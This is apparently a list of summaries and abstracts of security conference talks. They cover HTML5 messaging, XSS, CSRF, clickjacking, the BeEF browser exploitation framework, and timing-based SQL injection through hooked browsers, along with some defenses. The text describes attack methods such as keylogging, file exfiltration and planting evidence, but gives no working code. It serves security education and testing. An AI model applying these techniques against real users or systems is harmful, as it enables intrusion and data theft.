This document discusses using iframes, postMessage, and localStorage for communication in a sandboxed web application platform. It notes both advantages and disadvantages of iframes, describes how to securely communicate between iframes and different browser tabs or windows using postMessage, and explores strategies and considerations for using localStorage for communication.
The document provides an overview of secure web messaging in HTML5. It discusses how traditional methods of communication like JavaScript, AJAX, and frames had limitations due to the same-origin policy. The HTML5 postMessage API allows for secure cross-origin communication between frames by abstracting multiple principals. While more secure than previous techniques, the postMessage API still requires careful configuration of target origins, validation of received data, and mitigation of framing attacks to prevent security issues like cross-site scripting.
Slides of my talk at RuxCon 2013: For those who do not listen Mayhem and black metal, the talk title might seem a bit weird, and I can't blame you. You know the boundaries of the Same Origin Policy, you know SQL injection and time-delays, you know BeEF. You also know that when sending cross-domain XHRs you can still monitor the timing of the response: you might want to infer on 0 or 1 bits depending if the response was delayed or not. This means it's possible to exploit every kind of SQL injection, blind or not blind, through an hooked browser, if you can inject a time-delay and monitor the response timing. You don't need a 0day or a particular SOP bypass to do this, and it works in every browser. The potential of being faster than a normal single-host multi-threaded SQLi dumper will be explored. Two experiments will be shown: WebWorkers as well as multiple synched hooked browsers, which split the workload communicating partial results to a central server. A pure JavaScript approach will be exclusively presented during this talk, including live demos. Such approach would work for both internet facing targets as well as applications available in the intranet of the hooked browser. The talk will finish discussing the implications of such an approach in terms of Incident Response and Forensics, showing evidence of a very small footprint.
The document discusses cross-site scripting (XSS) attacks that can occur outside of web browsers on desktop and mobile platforms. It provides examples of XSS vulnerabilities found in Skype, Adium, Android's Gmail app, Google Earth, and outlines a tool built to automate discovery and exfiltration of files across platforms like Mac, Android and others. The document encourages developers to properly filter HTML and secure apps from XSS attacks.
The document discusses security considerations for HTML5. It notes that while HTML5 specifications are not inherently flawed, bad code can introduce new vulnerabilities. It outlines several attack vectors like XSS, history tampering, web storage manipulation, and clickjacking. It also discusses mitigations like script isolation, cross-document messaging, sandboxing, and CORS, noting their limitations. The document aims to raise awareness of the expanded client-side attack surface in HTML5.
This document discusses various web application attacks and protections. It covers Cross Site Scripting (XSS), Universal Cross Site Scripting, Cross Site Request Forgery (CSRF), Same Origin Policy, and how these vulnerabilities can be exploited through techniques like SQL injection, port scanning, cache poisoning and prototype hijacking. The document also discusses how to conduct "blind" SQL injection attacks when error messages are not returned.
This document discusses several HTML5-based attacks that could be used to compromise a target named Bob. It describes using filejacking to access files on Bob's computer, poisoning Bob's app cache to gain persistent access, performing silent file uploads to plant incriminating evidence, using UI redressing to trick Bob into actions, and extracting sensitive information from Bob's employer's internal sites using drag-and-drop content extraction. The document provides proof-of-concept demos and notes limitations but emphasizes that HTML5 expands attack possibilities against unaware users. It concludes by encouraging developers to implement proper defenses like X-Frame-Options to prevent framing attacks.
Video recording of the talk: https://connect.ruhr-uni-bochum.de/p3g2butmrt4/ HTML5 is quickly gaining media attention and popularity among browser vendors and web developers. Having tremendous features, together with its sister specifications like Drag & Drop API, File API or Geolocation it allows developers to build rich web applications that easily blend with desktop & mobile environments. The talk will be focused on finding the weakest link and combining several recent attack techniques to turn a security vulnerability into a successful exploit. We'll show how to build a successful advanced UI-Redressing attack (also known as clickjacking), presenting the latest findings in this field, including malicious games and quizes. We'll work on file upload functionalities in current web applications and see how attackers might use HTML5 APIs for their advantage. Putting all these building blocks together will enable us to launch an attack and exploit even the otherwise unexploitable vulnerabilities.
The document discusses security issues that can occur on the web front end, including cross-site scripting (XSS), cross-site request forgery (CSRF), and hijacking. It covers how the same-origin policy works and can be relaxed through mechanisms like document.domain and CORS. Specific types of XSS like persistent and DOM-based XSS are described. The document also discusses CSRF, hijacking techniques like clickjacking, and methods for finding vulnerabilities like XSS filtering and fuzzing. Defensive techniques like X-Frame-Options, Content Security Policy, HTTPS, and CSRF tokens are recommended.
Outline: What the hell is BeEF? ✴Cutting Target enumeration and analysis ✴Devouring Internal net fingerprint Exploiting internal services through the hooked browser Keylogging, browser pwnage ✴Digesting Persistence, tunneling sqlmap/Burp through BeEF proxy XSSrays integration ✴Future development and ideas
This document outlines an agenda for a presentation on web application attacks. The presentation will demonstrate common vulnerabilities like unvalidated parameters, access control flaws, session management issues, cross-site scripting, injection flaws, improper error handling, AJAX security issues, authentication flaws, code quality issues, concurrency problems, and parameter tampering. It lists tools that will be used like WebGoat and WebScarab and provides references for further information.
This document discusses the Browser Exploitation Framework (BeEF), which allows penetration testers to target browsers within different security contexts and select modules in real-time to exploit vulnerabilities. It outlines how BeEF can be used to enumerate targets, fingerprint internal networks by detecting devices from their images, exploit services like JBoss via the browser, persistently keylog victims, tunnel network requests through the browser as a proxy, and integrate the XssRays module to detect cross-site scripting vulnerabilities. Future development ideas include improving XssRays and adding multi-hooked browser support.
XSS (cross-site scripting) is a client-side vulnerability that allows injection of malicious JavaScript which can then be run on a victim's browser. The document discusses different types of XSS (non-persistent, persistent, DOM-based), examples of how to perform basic and advanced XSS attacks, ways XSS has been used on major websites, and how attackers can exploit XSS vulnerabilities for activities like session hijacking, cookie stealing, clickjacking, and more.